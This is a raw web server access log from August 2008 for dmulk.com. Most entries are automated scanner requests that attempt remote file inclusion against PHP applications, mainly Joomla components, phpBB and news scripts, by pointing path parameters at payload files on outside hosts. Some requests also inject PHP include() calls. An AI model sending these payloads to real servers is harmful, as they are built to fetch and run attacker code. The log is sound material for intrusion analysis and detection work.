217.198.149.178 - - [12/Aug/2008:09:08:21 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:08:22 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:08:22 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:08:34 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:08:37 -0700] "GET /logs/access_080329.log//ashnews.php?pathtoashnews=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:08:44 -0700] "GET /logs/access_080329.log//ashnews.php?pathtoashnews=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.75.31.142 - - [12/Aug/2008:09:08:52 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.cinepobrasil.com.br/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.75.31.142 - - [12/Aug/2008:09:08:53 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.cinepobrasil.com.br/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:09:06 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:09:06 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:09:33 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
205.234.193.81 - - [12/Aug/2008:09:09:35 -0700] "GET /logs/access_080127.log//vwar/convert/mvcw.php?step=1&vwar_root=http://christianserna.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.193.81 - - [12/Aug/2008:09:09:35 -0700] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://christianserna.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.193.81 - - [12/Aug/2008:09:09:35 -0700] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://christianserna.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:09:45 -0700] "GET /logs/access_080305.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:09:45 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:09:45 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.119.28.109 - - [12/Aug/2008:09:09:46 -0700] "GET /logs/access_080218.log//index2.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://www.samnus.com.mx/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.119.28.109 - - [12/Aug/2008:09:09:46 -0700] "GET /logs//index2.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://www.samnus.com.mx/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.119.28.109 - - [12/Aug/2008:09:09:46 -0700] "GET //index2.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://www.samnus.com.mx/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:09:54 -0700] "GET /logs/access_080401.log//ashnews.php?pathtoashnews=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:09:54 -0700] "GET //ashnews.php?pathtoashnews=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:09:54 -0700] "GET /logs//ashnews.php?pathtoashnews=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.149.248.38 - - [12/Aug/2008:09:09:55 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "http://www.vfrdiscussion.com/forum/index.php?showtopic=36984&pid=538397&st=0&#entry538397" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:10:01 -0700] "GET /logs/access_080104.log//Neos_Chronos/header.php?base_folder=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.133.215.166 - - [12/Aug/2008:09:10:18 -0700] "GET /logs/access_080218.log//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.samnus.com.mx/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [12/Aug/2008:09:10:18 -0700] "GET /logs//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.samnus.com.mx/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [12/Aug/2008:09:10:18 -0700] "GET //administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.samnus.com.mx/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [12/Aug/2008:09:10:18 -0700] "GET /logs/access_080218.log//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.samnus.com.mx/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [12/Aug/2008:09:10:18 -0700] "GET /logs//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.samnus.com.mx/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [12/Aug/2008:09:10:18 -0700] "GET //administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.samnus.com.mx/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.61.106.55 - - [12/Aug/2008:09:10:27 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ashlandpress.com//backup/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
69.61.106.55 - - [12/Aug/2008:09:10:29 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://ashlandpress.com//backup/bot.txt?? HTTP/1.1" 200 18529 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:10:36 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
205.234.193.81 - - [12/Aug/2008:09:10:40 -0700] "GET /logs/access_080219.log//vwar/convert/mvcw.php?step=1&vwar_root=http://christianserna.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.119.28.109 - - [12/Aug/2008:09:10:52 -0700] "GET /logs/access_080113.log//index2.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://www.samnus.com.mx/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:10:57 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:10:57 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:10:58 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:11:00 -0700] "GET /logs/access_080329.log//ashnews.php?pathtoashnews=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:11:04 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:11:07 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:11:12 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:11:18 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:11:19 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:11:22 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:11:23 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.187 - - [12/Aug/2008:09:11:27 -0700] "GET /logs//pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.187 - - [12/Aug/2008:09:11:28 -0700] "GET //pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:11:34 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:11:41 -0700] "GET /logs/access_080311.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:11:47 -0700] "GET /logs/access_080302.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:11:47 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:11:47 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.168.112.10 - - [12/Aug/2008:09:11:54 -0700] "GET /logs/access_080102.log/modifyform.html?code=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [12/Aug/2008:09:11:55 -0700] "GET /modifyform.html?code=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [12/Aug/2008:09:11:55 -0700] "GET /logs/modifyform.html?code=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
208.99.194.216 - - [12/Aug/2008:09:12:06 -0700] "GET /logs/access_080219.log/errors.php?error=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [12/Aug/2008:09:12:06 -0700] "GET /errors.php?error=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [12/Aug/2008:09:12:06 -0700] "GET /logs/errors.php?error=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
130.76.96.16 - - [12/Aug/2008:09:12:11 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "http://www.vfrdiscussion.com/forum/index.php?showtopic=36984" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 (CK-zz) Firefox/2.0.0.14" "dmulk.com"
208.99.194.216 - - [12/Aug/2008:09:12:11 -0700] "GET /errors.php?error=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [12/Aug/2008:09:12:11 -0700] "GET /logs/errors.php?error=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [12/Aug/2008:09:12:11 -0700] "GET /logs/access_080219.log/errors.php?error=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [12/Aug/2008:09:12:14 -0700] "GET /logs/access.log/errors.php?error=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [12/Aug/2008:09:12:19 -0700] "GET /logs/access.log/errors.php?error=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:12:27 -0700] "GET /logs/access_080401.log//ashnews.php?pathtoashnews=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:12:27 -0700] "GET //ashnews.php?pathtoashnews=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:12:28 -0700] "GET /logs//ashnews.php?pathtoashnews=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:09:12:33 -0700] "GET /logs/access_080211.log//accounts.php?command=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:09:12:33 -0700] "GET //accounts.php?command=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:09:12:33 -0700] "GET /logs//accounts.php?command=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:12:34 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:12:41 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:12:44 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
206.168.112.10 - - [12/Aug/2008:09:12:44 -0700] "GET /logs/access_071215.log/modifyform.html?code=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:12:46 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:12:48 -0700] "GET /logs/access_080329.log//ashnews.php?pathtoashnews=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:12:50 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:09:12:50 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:13:23 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:13:24 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:13:34 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.133.215.166 - - [12/Aug/2008:09:13:41 -0700] "GET /logs/access_080218.log//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.samnus.com.mx/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [12/Aug/2008:09:13:41 -0700] "GET /logs//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.samnus.com.mx/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [12/Aug/2008:09:13:41 -0700] "GET //administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.samnus.com.mx/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.178.37.115 - - [12/Aug/2008:09:13:49 -0700] "GET /logs/scanhttp://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.178.37.115 - - [12/Aug/2008:09:13:49 -0700] "GET /scanhttp://landlordtools.com/dt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
222.237.78.125 - - [12/Aug/2008:09:14:04 -0700] "GET //pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:14:05 -0700] "GET /logs/access_080104.log//Neos_Chronos/header.php?base_folder=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:14:34 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
74.53.240.146 - - [12/Aug/2008:09:14:50 -0700] "GET /logs/access_080321.log%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.dogshop.at/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.8 - - [12/Aug/2008:09:14:54 -0700] "GET /logs/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.8 - - [12/Aug/2008:09:14:55 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:15:02 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:15:03 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:15:05 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:15:05 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:15:25 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:15:35 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
62.48.41.130 - - [12/Aug/2008:09:15:43 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.23 - - [12/Aug/2008:09:15:47 -0700] "GET /presto/ HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
202.70.83.4 - - [12/Aug/2008:09:15:48 -0700] "GET /logs/access.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ugtcajamadrid.org/ips.tx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.70.83.4 - - [12/Aug/2008:09:15:49 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ugtcajamadrid.org/ips.tx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
